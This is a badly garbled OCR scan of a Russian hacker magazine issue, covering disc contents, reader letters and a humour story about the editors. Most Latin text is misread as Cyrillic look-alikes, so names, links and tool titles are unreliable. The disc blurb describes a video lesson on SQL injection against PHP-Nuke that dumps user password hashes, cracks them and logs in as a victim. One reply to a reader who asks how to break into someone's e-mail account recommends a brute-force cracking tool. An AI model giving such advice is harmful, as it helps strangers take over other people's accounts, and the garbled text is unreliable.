Регионы: ООО "Корпоративная почта", тел.: 953-92-02, е-таіі: крр@зоѵіп1еІ.ги 

Для получения счета на оплату подписки нужно прислать заявку с названием журнала, периодом подписки, банковскими 
реквизитами, юридическим и почтовым адресом, телефоном и фамилией ответственного лица за подписку. 













в 1 еоурок: 

80МКІЕСТІІМ 



В этом уроке проводится 
атака на популярный сайтовый 
движок РНР-пике. Из-за того, что 
разработчики забыли отфильтровать 
пробелы и кавычки в одной из перемен- 
ных, которая участвует в $01_-запросе, ста- 
ла возможной атака ЗОЫщесйоп. Сейчас 
этот баг крайне распространен: по некоторым 
оценкам, каждый третий сайт, работающий на 
301.- движке, уязвим. Используя команду 501- 
сервера ІЛМІОМ, хакер может внедрить свой зап- 
рос в базу данных. Какую пользу он может из это- 
го извлечь? Как раз это ты и увидишь в нашем ви- 
деоуроке. Исполнив хитрый запрос, хакерша выве- 
ла на экран содержимое таблицы пике_изег5, хра- 
нящую логины и зашифрованные пассы всех заре- 
гистрированных пользователей сайта. После этого, 
с помощью софтинки тсібіпзісіе, она расшифрова- 
ла некоторые хеши паролей и наглядно продемо- 
нстрировала их "работоспособность", залогинив- 
шись в системе и оставив на сайте "привет из 
России" от имени похаканного юзера. 



ПРОГРПНМКСШШНПШ 
СВПРНІС8 8ШТЕ 12 



0ЕІЩ0Я8 



Прошло почти полтора года с мо- 
мента выхода СогеЮРІАѴѴ ОгарМісз 
Зиііе 11, и вот компания СогеІ 
представила свое новое дети- 
ще - двенадцатую вер- 
і сию. Появилось много 

обновлений, ко- 
торые при- 



дутся 



Лучшая прога для обработки изображения при 
сканировании. Поддерживает огромное количество 
всевозможных сканеров и очень проста в использо- 
вании. На диске лежат версии под ѴѴіпсІоѵѵз и І_іпих. 
Так что теперь ты можешь сканить картинки под 
своей любимой осью ;). 

ПРОГРОИИО: Р1ИІ8ЕК 1.0 

ОС: ШІН00Ш8 

Полное название программы - Ргоасііѵе ѴѴіпсІоѵѵз 
Зесигііу Ехріогег. Эта утилита предназначена для 
тестирования парольной защиты в ОС семейства 
N1. Она позволяет системным администраторам 
находить аккаунты пользователей, имеющие паро- 
ли, нестойкие к перебору. Системный администра- 
тор также может найти пароль любого пользовате- 
ля, используя прямой перебор и атаку по словарю. 



Отличная программка для того, 
чтобы проверить, находится ли УИН в 
инвизибле. Кроме этого, она может ав- 
томатически следить за юзером, и если 
он сменит статус, ты тут же об этом узна- 
ешь. В общем, каждому асечнику такая шту- 
ковина пригодится! :) 



по душе людям, интересующимся 
векторной графикой. Если ты считаешь себя худож- 
ником, то обязательно поставь новую версию одного 
из самых известных и мощных графических пакетов. 



ПРОГРПМННЕЗСПН 7.6 

ос:иіішш8,иш 
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Набор утилит для восстановле- 
ния "забытых" паролей. Имеются 
подходы ко всем приложениям М3 
Шісе и не только: 

- ВАВ/ѴѴіпВАВ 

- М3 ѴѴогсІ ХР/2000/97 

- М3 ЕхсеІ ХР/2000/97 
-М$ Ассезз ХР/2000/97 
-М3 ОиІІоок ХР/2000/97 

- М3 Ргоіесі 2002/2000/98 
Поддерживает бругфорс-атаки. 



Мощное средство разработки справочных файлов 
ѴѴіпсіоѵѵз. В этой программе легко создавать хелпы раз- 
личных форматов: Справка НТМЦ Классический ѴѴіпНеІр, 
МісгозоЙ Неір 2.0, а также документы ѴѴогсІ и файлы фор- 
мата РРР. 



С01 



а ѴѴІ N ООѴѴ5 

■ зузіет 

Ассезз Асітіпізігаіог Рго 3.4 
Асііѵе РІІе Ресоѵегу 5 
АОѵапсесі Зесигііу ЕеѵеІ 5.3 
СІеап Зрасе 8.75 
Ѳепіе Васкир Мападег 4 
Ргоіііе 1 .4 
РѴѴ5ЕХ 1 .0 

ТРе СІеапег 4.0 Ргоіеззіопаі 
ТипеІІр ШІІІІІез 2003 
ТигЬоВаскир 3.1 

■ пеі 

ВиІІеіРгооІ РТР 
Соке теззепдег 1.3.8 
СІМ5И Меззепдег 1 .7 
РІазРѲеТ 1 .50 
НЮоѵѵпІоасІ 4.6 
МогіІІа Рігеіох 0.8 
Му ІР Зиііе 5.0 
РаібепРТРО 2.4 
НеаІ ѴѴеЫпТо 
Тіпу РегзопаІ РігеѵѵаІІ 5.5 
ЦИгаРХР 1 .0 
іш 

■ Оеѵеіортепі 

СиТеНТМІ Рго 5.0 
Неір & МапиаІ 3.4.0 

■ тиШтеШа 

411 ѴѴМА МРЗ СопѵеПег 3.1.5 
АсІоЬе Аисііііоп 1 .0 
АІІѵе ѴѴМА МРЗ Ресогсіег 1 .0.3.8 
СогеЮРАѴѴ ѲгарРісз Зиііе 12 



Рг Тад РІиз 2 

РРЭЗРоѵѵ МРЕС-4 ѴІОео ОесоОег 
ІсопСооІ Егіііог 4 
Него ІпІоТооІ 2.07 
Оѵіз РсІТ-ОТТІсе 2,2 
РйР Ріррег 1.01 
РР0І02ѴСР Ргоіеззіопаі 2.75 
РІіоіоМеізіег Ргоіеззіопаі 2.45 
ѴиеЗсап 7.6 
ѴѴіпОѴО Ресогбег 4.5 
ХпѴіеѵ» 1 .68 

в ГПІ5С 

ЗЭІМОезкІор 1.1 
Вооі Ебііог 0.9.93 
Егу Еоап Саісиіаіог 2.5 
РаззѵѵогР Ресоѵегу 
2е(аРах Зегѵег 8 

• ІІШХ 

■ зузіет 

соУпих 

кегпеі 

■ пеі 

аМиіе 1.2.5 
сІІІІо ѴѴеЬ Ьгоѵѵзег 0.8.0 
Касіи 0.3.7 
МШопкеу 2.5.11 
МогіІІа Рігеіох 0.8 

■ (Іеѵеіортепі 

ВІІРоск ІпзІаІІВиіІОег 1 .0 
РіпсІВидз 0.7.1 
МуЗОІ. 5.0 

■ тиііітесііа 

Оіглр 2.0ргеЗ 
ЮЗ Тад Ргатешк 0.95 



ІѴѴапІѴСО 0.05с 
УЬМРЕѲЗ 1.5.4 
ІопдРІауег 0.99.2 
ОІРагііо 0.8.1 
Оиіскііте (ог Упих 2.0.2 
ѴиеЗсап 7.6 
ХМоѵіе 1.9.12 
ХпѴіеѵѵ 1 .68 

■ тізс 

І_агде РІІе НехЕсІііог 0.3.7 
І_ита 1 .2 

Риззіап Маііа 0.992 
ТТіе Різіі 0.4.4 
Тих Соттапсіег 0.4.101 
ХОгаѵѵСМет 1 .7.7 



С02 



■ ѴізиаІНаск++: 80Е-іпіесііоп 

■ Хакер 01(61) в РРР 

Все номера Хакер'а за 2002 
года в РОР 

■ сіетов 

Демки, занявших первые пять 
мест на Зіаіе 01 ТМе Агі 2004: 
-СОМА 

- іпіегсеріог 

- зр4-02 : Іоѵѵ Ьисідеі 

- Еѵегубау.ЗирегІіегоез 
-КЕТСНЕІР ККЕЕРЗ 

■ ШароѴѴАРЕІ 

ВѴѴМеіег 1.3.1 
СгагуТуріпд 2.0 



С-Іоск ЗратСотЬа1 1 .40 
Міаипсііег 1 .2 
РіхххЗаіе 2.1 
Ретоѵе НісМеп Оаіа 
Зсореѵѵаге Ѵізіоп Ргоіеззіопаі 
2.2 

ТгауТИіз! 3.1 РС1 
ѴѴМСіІу 2.0 

■ ІІпіхѴѴАВЕ2 

Саіеоп 1.2.13 
Сгір 3.0.7 
Юепегаі 1.1.1 
Х-Сй-Роазі 0.98аІрТга15 

■ Х-Т00І2 

РТР Вгеакег 

НіРіііег 0.7 

ІР-Тооіз 2.20 

РаззѴіеѵѵ 1 .5 РСЗ 

Ретоіе Асітіпізігаіог 3.0 (Ье(а) 

■ ТРА5Н 

Мизіс 







СПОНСОР РУБРИКИ «ЮНИТЫ» - ЦНТ ЦЕНТРППЬНЫЙ ТЕПЕГРПФ 

ііиіпшрхішдііипш.смш 



письмо: от: оіе 9 Козіуіеѵѵ [таіІІо:зреесІуоІед@таіІ.ги] 




Ну, здравствуйте, коли уж написали... в смысле наоборот - спасибо, что прочита- 
ли мое леттер! Хочу... да нет - просто нуждаюсь в ответе на запоздалый вопрос, 
но еще актуальный: во имя какой идеи вы вынесли Даню из полос вашего XXX- 
тадаііпе? Заменив его высоколитературные и развивающие тэги с осленком в 
главных ролях на полное фуфло и отстой с плоскими видами хумора (я это могу и 
в ВгаѵоСігІ почитать). Карочя, ХУМОР теперь отстой, так что можно энту странич- 
ку использовать в ѴѴС. Если Даня откусил себе мозжечок или защищает галактику 
с корейскими ѴОСЮОО, можно было заменить его Осликом. Да и вообще жур- 
нальчик уже не хаксорный, а мануал для ламья как "сломати (Ьі.доѵ". Ближе к те- 
лу, господа, пусть дорого стоить будет и адвертизинга больше, но интереснее (на 
крайняк буду кушать подножный корм дабы сэкономить на ][). 

Все. РЕМГАбОІЧ-ждет! 

Пы.Сы. Холод, я знаю, что я тебе тоже нравлюсь, завтра в н-цать в Парке. Одень 
пушистые розовые шортики, чтоб я тебя узнал. 

Пы.Сы. 2. На ошибки извращайте внимания - нету Ворда, форматирую 3 раза в 
день, в надежде на лучшую эрекцию. 

С уважением к адульту 460І\Іо пате! 

Ответ X: 

Н у, здравствуй! Наконец-то ты нам ответил, а то уж все буковки на кла- 
ве стерли, печатая тебе лейеры - думали, не дождемся весточки от 
тебя. Спешу ответить на твой вопрос, на который, впрочем, отвечали 
уже 937 раз. Итак: Даня ушел строить свою секту в другое печатное издание, 
кстати, что-то вроде ВгаѵоСігІ. А мы, в свою очередь, над Хумором и Запад- 
лом сейчас активно трудимся, закупили специально выращенных ботов. Они 
такое скоро забабахают, что держись! Еще мы решили делать страницы Ху- 
мора журнала из более плотной бумаги, чтобы неблагодарные читатели зна- 
ли, что не все так мягко и нежно в этом мире. Но не Хумором единым мы жи- 
вы, так что и в остальных рубриках идут постоянные переколбасы и улучше- 
ния, все для тебя стараемся. 

Пы.Сы. Холод будет, жди! Мы специально его выцепили из дружественного 
журнала Хулиган и подрядили встречаться с тобой. Постоянно. В Парке. В 
розовом одеянии. 

Пы.Сы. 2. Не парься, ошибки мы подправили - у нас Ворд есть. А насчет 
эрекции - я тут, конечно, не специалист, но, имхо, ты что-то не то для нее 
делаешь... 



письмо: от: Оатіпоі [таіІТо : Сатіпо1:@ Ігоітаіі . сот] 




НеІІо, Хакеры! 

В общем, журнал ваш хороший, интересный. Но мало про уязвимости пишете! И 
вообще... зачем часть статей подведена под ушастых и тупых СІ5ег(Ѵ)ТМ -ов? Те- 
перь (Іслушать сюда!) про какой бред вы в некоторых статьях пишете... тестиро- 
вание видях, например, мы сами знаем, что Васіеоп круче ІЧѴІсІіа... Зато! Ходили 
туг интересные черви - МуЭоот, ЗоВід, хоть бы, например, их алгоритмы срав- 
нили и потестили! ...Почему только про *піх (мало) и ѴѴІпАІІ (много) пишете, раз- 
ве других осей нет? Зачем посреди статей надоедают (?) тикотрипсы, от которых 
у меня уже нервный тик. . . И почему мало кодинга?! . Но вообще, все круто, но на- 
до еще лучше, пока не будет ТипаРопе - (новая конструкция от физмата - обоз- 
начает действие в превосходной степени). 

Р.З. Если нужна помощь по написанию статей вирусной тематики, то всегда го- 
тов помочь. 

Ответ X: 

еллоу, Гаминот! 

В общем, мы очень рады, что наш журнальчик хороший и интересный. 
Про уязвимости обещаем писать больше, также как больше про кодинг, 
*піх’ы и все остальное - мы ж потолстели, как ты уже, наверное, приметил, 
так что есть возможность, да и желания хоть отбавляй! О том, что Вабеоп кру- 
че №Ма, знают далеко не все, да мало того - не все так считают, вот мы и 
высказали свое субъективное мнение, так, чтобы народ его знал. 

Я вот только про Тірз&Тгіскз не понял: чем тебе не нравится-то? Тем, что они 
разбросаны по всему журналу или ты их не приемлешь как разновидность? 
Но вообще, мы сильно стараемся, чтобы было йопе, решало и т.п. Короче, 
чтобы было качественно на любых диалектах, включаю физматовский :). 
Если есть что написать, то обращайся непосредственно к редакторам - их 
контакты на развороте с содержанием в начале журнала. 



ПИСЬИО: ОТ: Андрей Глуховцев [таіІІо: 9 200 г@таіІ.гц] 




Доброго времени суток. У меня два вопроса. 1 . Где Даня? 2. Где мой приз за ме- 
га-ремейк "Буратино 2003"? Даня (выговор с занесением в грудную клетку) ди- 
намил пару месяцев обещаниями отправить почтой, затем пропал. Вы так со 
всеми победителями конкурсов поступаете? Потом, кто там за верстку отвеча- 
ет, и кто его проверяет? Руки оторвать! В течение нескольких номеров я фигу- 
рировал в роли автора Хумора под редакцией Дани. Как после этого смотреть в 
глаза людям? :-) Нанесена тяжелейшая психологическая травма! Почтовый ящик 
загажен предложениями лечиться и т.д. Знакомые пальцем показывают. Что де- 
лать будем? 

С уважением Схоог. 



Ответ X: 



Д оброе утро, біоог (когда я отвечаю на письмо, за окном именно утро)! 
У меня к тебе два ответа. 1 . Смотри первое письмо на этой странице - 
там все расписано про Даниила. 2. Судя по всему, Даня забрал твой 
приз с собой или вручил его Ослику, так что к нам без обид - ну не в курсах 
мы, что за конкурс такой, все шеповаловские потехи. А ящик свой просто 
почисти и спам-фильтр поставь, хотя зачем - ведь это же популярность! 
Многие о таком только и мечтают, а ты не радуешься! Странно как-то. А в 
глаза людям смотри с гордостью! ;) 



ПИСЬМО: ОТ: Иван Зайцев [таіІІо:2040205@гатЫег.гц] 
А как взломать электронный адрес на Хотбокс? 




Ответ X: 



П онимаешь, Иван, тут я тебе не помощник. Я простой робот, 
отвечающий на письма читателей, и о хакинге знаю только чуть-чуть, 
понаслышке. Для того чтобы помочь тебе, пришлось подать запрос в 
Яндекс, Гугл и знакомому парнишке. Первые два - тоже роботы, так что 
особо не помогли, а вот последний сначала посоветовал попробовать 
использовать мозги, а если не получится - программку под названием Вгиіиз 
АЕТ 2 (ти.ре$Іра(гоІ.сот/Ре$ІІп(о/1)/І)ги(и$.аеі_2.а$р). С ее помощью можно бругить 
РНр, Нр, рор, $т(р. Так что дерзай. Удачи! Подбирай пароли, но только в 
чисто ознакомительных целях :). 




I 



ПИСЬМО: ОТ: Иван Петров [пР12003@запйу.ги] 




Уважаемые Господа! 

Я Ваш давний читатель, начиная с 1999 г. У Вас очень крутой журнал и сайт, это 
замечательно! Постоянно узнаешь что-то новое, интересное, это классно! Неко- 
торые дружеские пожелания для Вас - уделять больше внимания статьям с прог- 
раммами-шпионами, с более подробными описаниями. К сожалению, абсолют- 
ное большинство программ, которые вы приводите в журнале и на сайте, для 
корректной работы требуют регистрации! А за регистрацию заграничные буржуи 
требуют перечислять круглые суммы в у.е. Так недолго и разориться! Вот я и по- 
думал, может быть у Вас есть файл езргокеу.гед для регистрации программы- 
шпиона (для анонимного дубляжа и пересылки эл. почты абѵапсеб-етаіГтопіІог- 
іпд, которую Вы представляете на Вашем сайте)! 

Будьте так любезны, если у Вас есть этот самый файл езргокеу.гед (или, может, 
какая другая микстура, его заменяющая), отослать его мне по электронной. 

С благодарностью, жду ответа!!! 

Петров И.К. 

Ответ И: 

П ривет! Первое, что заинтересовало в твоем письме - это твое имя. Де- 
ло в том, что именно так зовут нашего редактора, Купера - может, 
слышал о таком? :) Мы в редакции сначала даже подумали, что Кут тро- 
нулся умом и сам себе пишет письма, но потом, вроде, прояснилось, что это 
не он. Ладно, переходим к твоему письму. Внимания всяческим шпионам бу- 
дем уделять больше, обещаем. Про регистрацию программ: да, шароварный 
софт требует регистрации или лечения от этого недуга. Лекарство почти к 
любой проге ты можешь найти сам без особого труда в инете, но мы выкла- 
дывать кряков не будем, не проси. Конечно же, надо покупать программы, 
ведь разработчики не зря стараются, им тоже кушать надо! Файла 
езргокеу.гед у меня нет, но если таковой найдется, кину. 



ПИСЬМО: ОТ: Раппу [таіІШ:іпд@ЬІІги5.сІіикоІка.ги] 




Здравствуйте, многоуважаемый двойной яд +). У меня туг вопросик! Возможно 
ли получить у вас почтовый ящик??? И реально это, ваще, сделать! Заранее 
п4сибки за ответ! 



Ответ X: Л 



П ривет, Денни! Я, конечно, не двойной яд, да и не яд я вовсе. Но так уж 
вышло, что отвечать на твой вопрос приходится мне. Почтовый ящик у 
нас получить, увы, больше нельзя. Никак и ни за что. Хотя стой! Я знаю 
один способ, только никому не говори: нужно устроиться к нам в редакцию, 
написать несколько хороших статей, стать постоянным автором, тогда у те- 
бя, наверное, появится редакционная почта. 



ПИСЬМО: ОТ: р!таепіх@сотс!ш [таіІІо:рбоепіх@сотс!ш] 




Здрасьте, хакеры! 

Помогите найти информацию по информационной безопасности на тему: 
"Загрузка альтернативной ОС с нештатного носителя". Мне на эту тему нужно 
реферат писать, ничего не смог найти. 

Заранее спасибо за помощь! 

Ответ X: 

З драсьте, р!юепіх@сотс!і.ги! 

Мы тут очень долго скрипели мозгами, чтобы помочь тебе в решении 
твоей проблемы, и вот что придумали: иди по следующему адресу и 
никуда не сворачивай! ІтНр://ѵѵѵѵѵѵ.доодІе.сот.ги/$еагсІі?д=%00%97%00 
%ВО%00%ВЗ%01%80%01%83%00%В7%00%ВА%00%ВО+%00%ВО%00% 
ВВ%01 %8С%т %82%00%В5%т %80%00%в0%00%в0%0 1 %82%Р0%В8 
%00%В2%00%ВО%00%ВЕ%00%В9+%00%9Е%00%А1 +%01 %81 +%й0% 
ВО%О0%В5%О1 %88%т %82% 00% В0% Р 1 %82% 00% В 0% 00% В Е% 00% В 3 
%00%В Е+% 00%В 0% 00% В Е%т %8 1 %00%В8%т %82%00%В5%00%ВВ 
%01%8Р&іе=иТР-8&ое=иТР-8Ш=гиШпС=%00%9Р%00%ВЕ%00% 
В8%01 %81 %00%ВА+%00%В2+6оодІе&Іг= 



ПИСЬМО: ОТ: ДИМА [таіІІо:МЕОМ@ІМВОХ.Ріи] 




Здароф, Хакер! 

У меня есть предложение, почему бы вам вместо 2 СР'шек не выпускать 1 
МЗ'шник! И еще у вас в Юнитах есть обложка для диска - вам бы ее на отдель- 
ном листе печатать, а то вырезать неохота!!! 

Ну, вот и все, удачи вам! 



Ответ X: Л 



З дароф, Дима! 

Предложение твое рассматривалось уже, но мы не делаем этого, т.к. 
все-таки пока у меньшей части наших читателей есть 0\Я)-приводы. Мы 
очень хотим, чтобы максимальное число пользователей имело возможность 
без проблем пользоваться нашими дисками. В будущем, может, мы будем 
выходить с М), но не сейчас. Пока еще не время. 

Про обложку - идея хорошая, примем к сведению. У нас тоже есть свои раз- 
работки, так что не расстраивайся, все будет! :) 




НУ И ГДЕ МОИ КРЯКЕР ИНТЕРНЕТА? 



А ТЫ ЗАПУСТИ .ЕХЕ-ШНИК ИЗ АТТАЧА! 




юниты 
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КРОТКИЙ КУРС 30П0ДП0СТР0ЕНИЯ 



ХУМОР 



Тися: 

девушка из ниоткуда 



Одна ночь из жизни редакторов Хакера 

Думаешь, легко живется редакторам журнала? Думаешь, им всего хватает: любви, 
денег, счастья? Ты заблуждаешься. Почему? Читай ниже. 



мальчики РПБОТППИ 

л Время: 03:30 

л Место: квартира Симбиозиса 

л Действующие лица: 

аннее утро, а редакторы до сих 
пор не спят, и это не удиви- 
тельно - гоняли шершавого 
весь месяц, и к моменту сдачи 
дисков видеоурок по взлому не 
готов. Вот и приходится, как на 
сессии, ваять все в последние 
часы, чтобы не отхватить по 
шишке от Ядовитого. Вернее, ваял один Сим- 
биозис, а Куттер тем временем тихо и непри- 
нужденно уже шестой час висел на телефоне, 
пытаясь склонить свою подружку к "сексу по 
проводам". Это он так ласково называл трах 
по телефону, думал, что так звучит загадочнее 
и более возбуждающе. К огорчению Купы, 
тетка никак не соглашалась лишиться вирту- 
альной девственности. Во всяком случае, с та- 
ким подонком, как он. Купер от бессилия и 
безысходности нервно теребил волосы. Пока 
на голове. Но он чувствовал, что еще чуть- 
чуть, и волосы на груди тоже не останутся без 
внимания. Особенно интересным было то, что 
грудь у него не волосатая, и для этих целей 
придется использовать Симбиозиса. 

А тот, ничего не подозревая, сидел перед 
компом - старым раздолбанным вторым пнем с 
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15-дюймовым монитором - и пытался освоить 
Адобовский Премьер. Ему было в новинку запи- 
сывать видеоурок, но пришлось разбираться, 
ведь Купер постоянно. . . Ну вот, снова удар лок- 
тем снизу в челюсть и приказ: "Работай, негр, 
солнце еще высоко!" Андрюша попытался воз- 
разить, мол, это не солнце, это луна уже давно 



манит его в теплую постель, отдохнуть, наб- 
раться сил перед очередным трудовым днем. 
Но Купа молниеносно порубил его мечты: "Ка- 
кая разница? Все равно она желтая и торчит 
почти в зените! Работай, паши, скотина, за что 
я тебе деньги плачу?" - и вернулся к незатейли- 
вой беседе по телефону. На глаза Андрюши на- 
вернулись скупые мужские слезы. Ему хотелось 
закричать, что он не виноват, что это Ванька, 
друг детства, не сделал видеоурок вовремя и 
теперь, пользуясь служебным положением, наг- 
лым образом эксплуатирует Симбиозиса в сво- 
их грязных целях. 

знакомство, которого 

НЕЖДППИ 

л Время: 04:00 

а Место: все там же 

а Действующие лица: еже плюс ОНА 

И тут появилась ОНА. Аська тихо пиликнула, 
объявляя о получении запроса на авторизацию. 
Ее звали Тися. "Какое красивое и необычное 
имя", - подумал Симбиозис. "Тися рифмуется с 
сисей и даже с писей", - подумал Купер. 

- Ой, приветик :), - сказала она очень мило 
и непринужденно. 

Симбиозис тяжело вздохнул, подумав об ос- 
тавшейся работе, и зачем-то ответил: 

- Дарова, именно тебя мне сейчас и не хвата- 
ло. 

Тися заметно расстроилась. Это была ее пер- 
вая попытка познакомиться в интернете, и ее 
сразу же наглым образом послали. "Хам, - поду- 
мала Тися. - И ник у него глупый". 

- Я так хотела познакомиться с тобой... - 
написала Тися, проглотив обиду. 

И тут Купера, заметившего вялую перепис- 
ку, осенило. Возмущенный отказом телефон- 
ной собеседницы, он стал искать новые пути 
морального удовлетворения. Извилины нап- 
ряглись и выдали альтернативный способ 
"секса по проводам". Какая разница, что будет 
играть роль провода: телефонный шнур или 
витая пара? Поэтому Кут бросил трубку и за- 
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нял место за компьютером - Андрюша легким 
движением руки был скинут со стула на пол. 
Пальцы уже печатали ответ Тисе: "Да не воп- 
рос - давай дружить!" 

Дальше - все как обычно: принцесса, сколь- 
ко тебе лет, где живешь? Ой, да ты там еще и 
с сестрой? А мы тут с другом. Давайте встре- 
тимся, прогуляемся, отдохнем парами и т.д. 
Общими усилиями фотография Тиси и ее 
сестренки Лиси была "отксерокопирована в 
интернет" - именно так назвала процесс по- 
сыла фоток новенькая в интернете Тися. К сло- 
ву, Тися так увлеченно и красиво говорила, что 
наши герои и думать забыли о работе. 

Иван уже строил грандиозные планы на 
завтрашний вечер. Подумать только: еще нес- 
колько минут назад он искал, с кем бы осуще- 
ствить по проводам свои необузданно рвущи- 
еся наружу сексуальные фантазии, а теперь 
наклевывается даже реал! "Безусловно, это 
удача, тут не может быть никаких сомнений. 
Тетки так и рвутся ко мне. Я - современный Ка- 
занова! Дон Жуан, привлекающий женщин на 
расстоянии! Я! Я..." - думал про себя Куттер. 
Но тут его привел в чувство Симбиозис, сооб- 
щив, что после нескольких неудачных попыток 
фотки так и не достигли его почтового ящика, 
а от Тиси - прекрасного, нежного, юного соз- 
дания - поступило неожиданное сообщение: 

- Млах, так какого хрена я регал ящик на 
Рамблере? 

ЛЕГКИМ ДВИЖЕНИЕМ РУКИ 
ТИСЯ ПРЕВРПЩПЕТСЯ... 

л Время: 04:15 
а Место: все там же 

а Действующие лица: 

"Да этот волосатый <сеп$огесІ> хотел нас 
развести! - в сердцах воскликнул Купер. - 
Из-за него мы убили кучу времени, которого 
у нас и так в обрез!" Усталые и обломавшие- 
ся редакторы вновь принялись за работу. 
Светало. Близился час X, близилось время 
Ч. Скоро ехать в редакцию с видеоуроком, а 
еще ничего не готово. Нет ничего, кроме до- 
сады на лже-Тисю. Но ася снова сказала: 
"Аууу". Весело так сказала. Можно было по- 



думать, что пришло сообщение от Ядовитого 
со словами: "Парни, вы молодцы, вы потру- 
дились на славу. Можете не делать того, что 
делаете, вот ваши гонорары и отпускные. 
Съездите, отдохните по полной программе". 
Уж очень весело ася сказала: "Аууу". 

Но это был не Яд. Это снова былО Тися. На 
этот раз от него поступило более конкретное 
предложение: 



- Я хочу играть с вашими петушками (нет, 
ну, конечно, Тися не так сказало, просто все 
равно цензура вырежет то, что сказало Тися :)). 

Глумиться над назойливым существом не 
было сил, и Симбиоз написал следующее: 

- Отстань, волосатое мохнорылое чудовище. 
Ты нам не интересен! Ни капельки! Ты слы- 
шишь? НИ КАПЕЛЬКИ! А будешь к нам приста- 
вать, отхватишь по темечку и копчику! 

После этого Симбиозис уже хотел послать 
извращенца в игнор, но тут всплыло окошко с 
такой мессагой: 

- Я готов заплатить вам. Вы дадите мне по- 
играть с вашими петушками, а я вас щедро 
отблагодарю. Все, что я хочу - играть с петуш- 
ками! 

Друзья весело загоготали, но, вспомнив 
кучу самых невероятных историй, происхо- 
дивших в Сети, задумались - а не развести 
ли мальчугана на бабло? Загребущие бары- 
ги, любители халявы почуяли запах денег и 
уже в который раз отложили работу по запи- 
си видеоурока. 

- Сколько? Сколько ты нам заплатишь? 

- По 300 мертвых президентов за петушка. 

300 у.е. 300 зелени каждому! Это была пос- 
ледняя капля. Упускать такой шанс было нель- 
зя, и пацаны сломались. 

- Значит так, внимай моим засылай, пот- 
ное, волосатое, шрекоподобное чучело. 
Сейчас ты переведешь небольшой кусок ба- 
бок на наш ВМЗ-кошелек, и смотри без фо- 
кусов! Если хоть на миг мы усомнимся в 
правдивости твоих намерений, пощады не 
жди. Ты будешь беспощадно... беспощадно 
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чил десять баков и на радостях ушел за пивом в 
стекляшку. Ладно, черт с ним и этими 10 долла- 
рами, если удастся нагреть Тисю, то поимеем 590 
на два рыла, а Бублику потом удалим часть легко- 
го за провинность". 

И тут ребят ждало самое страшное разоча- 
рование - откликнулся Бублик. Причем отклик- 
нулся весьма интересной фразой: "Привет, 
мальчики, я Тися :)". Редакторы переглянулись 
и засмеялись. Написали несколько теплых со- 
общений Бублику, назвали друг друга валенка- 
ми за то, что повелись на такое, вырубили асю 
и, наконец, принялись за урок. 

ЧИСТОСЕРДЕЧНОЕ ПРИЗНПНИЕ 

Да-да, именно так, это был я. Просто от нече- 
го делать я решил зло постебаться ночью над 
измученными редакторами, но я и не подозре- 
вал, КАК, оказывается, им тяжело живется. 
Бедные-бедные редакторы, от большой наг- 
рузки на работе, от труда на благо своих обо- 
жаемых читателей у них нет времени ни на те- 
ток, ни на отдых. Зачастую они даже не в сос- 
тоянии сразу распознать стеб. 

ВОЗВРПШЕНИЕ К СУРОВОЙ 
РЕППЫНОСТИ 

Кугтер в расстройстве сел на диван и подумал: 
"Пора увольняться из этого ада... но это потом, 
а пока... работа, работа и еще раз РАБОТА..." 

Но ни один хороший рассказ не обходится 
без барру-епб'а, поэтому спешу тебя обрадо- 
вать: с личной жизнью у наших героев все 
нормально и не надо думать, что они живут 
только общением в инете и по телефону. Но 
имя Тися до сих пор вызывает у них двой- 
ственные чувства: с одной стороны глупо по- 
велись, с другой - ведь весело было! ;) 






занесен в игнор-лист! (Куттер думал, что это 
звучит угрожающе.) 

- Ну что, Дюша, - обратился Купа к Симбио- 
зису - давай, какой там у тебя номер кошелька? 
Сейчас мы проверим, не врет ли этот убогий. 

- У меня нет ВМ-кипера :(. Но зато в асе ви- 
сит один чувак, которого мы с тобой хорошо 
знаем, и он может нам помочь! 

Симбиоз говорил про Бублика, автора статьи 
"ВебМани для продвинутых мучачосов". Уж у не- 
го-то точно был установленный кошель. Редакто- 
ры стукнулись в асю к Бублу и попросили номер 
его кошеля, предупредив, что на него сейчас при- 
дет часть нелегальных денег - черного нала, до- 
бытого потом и кровью реальных пацанов. Это 
было сказано для устрашения Бублика, чтобы он 
не слил лаве раньше времени, не предупредив их. 

Получив заветный номер ѴѴМ2-хранилища 
денег, редакторы, немного повеселев, передали 
его Тисе и попросили перекинуть туда хотя бы 
баксов 10. Еще они сказали, что после получе- 
ния денег будут на 100% уверены в Тисе, как в 
настоящем, реальном, но не совсем мужике :). 

АТися возьми, да и пошли деньги, ведь Бублик 
подтвердил этот факт, сказав, что принял десятку, 



и попросив код протекции, с которым пришло ла- 
ве. Тися спокойно сказал, что код - "милый" (без 
кавычек), но стал уже немного нервничать, подоз- 
ревая, что его могут наглым образом опрокинуть 
на зелень и не дать поиграться с петушками даже 
минуты. Тися постоянно спрашивал, скоро ли они 
начнут договариваться о встрече, а в ответ его 
ждало гробовое молчание. Тися был в отчаянии, а 
редакторы тем временем спешно устанавливали 
уже свой собственный кипер, и попросили Бубло- 
завра, короля вебмани, перевести деньги к ним. А 
тот исчез, испарился, замолчал. "Кидала, - поду- 
мали Кугтер и Симбиозис одновременно. - Полу- 



СП0В0 ПОТЕРПЕВШИХ 

Д а, признаемся, эта история основана на реальных событиях. Скотина Бублик, не имея ни- 
какого уважения к друзьям, которые горят на работе, зло стебал нас в самый неподходя- 
щий момент. Самым прикольным было то, что в столь ранний час в инете было больше не к ко- 
му обратиться за кошельком, вот и снесло нам башку от такого бреда :). В любом случае все 
мы от души посмеялись, ведь смеяться над собой очень полезно ;). 
зутЬіозіз & СиПег 
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Как ни странно, Какер делают обычные живые люди, которые 
даже не сильно отличаются от тех, кого ты видишь на улице. 
Однажды нан пришло письмо, где автор представлял нас всех 
такими напичканными имплантатами угрюмыми купь-хацкорами, 
которые сидят за иониками во всю стену, а вокруг них ездят ро- 
боты и открывают им пиво. Представь себе, это не так, мы учим- 
ся в обычных институтах, ездим как все в метро на Савеловский 
рынок за железками и, помимо компьютеров, имеем кое-какие 
человеческие увлечения. Если тебе интересно, на что похожа 
жизнь редакции и редакторов, читай Х-Сіеш, и мы расскажем 
тебе все о нас, любимых ;]. 






Ядовитый (2роі80и8) 



Л 

Н а день Святого Валентина моя 
девушка подарила мне [Зесізіоп 
Макет - шар для принятия решений. 
Забавная штука - металлический ша- 
рик на подставке, разделенной на 
секторы с универсальными ответами. 
Вращаешь шарик и смотришь, на ка- 
кой сектор укажет цветной подшип- 
ник. Короче, если ты когда-нибудь 
был в казино или хотя бы смотрел 
«Поле Чудес», то смысл должен быть 
тебе ясен. Мне, как водится, достал- 
ся дефектный девайс, поскольку он 
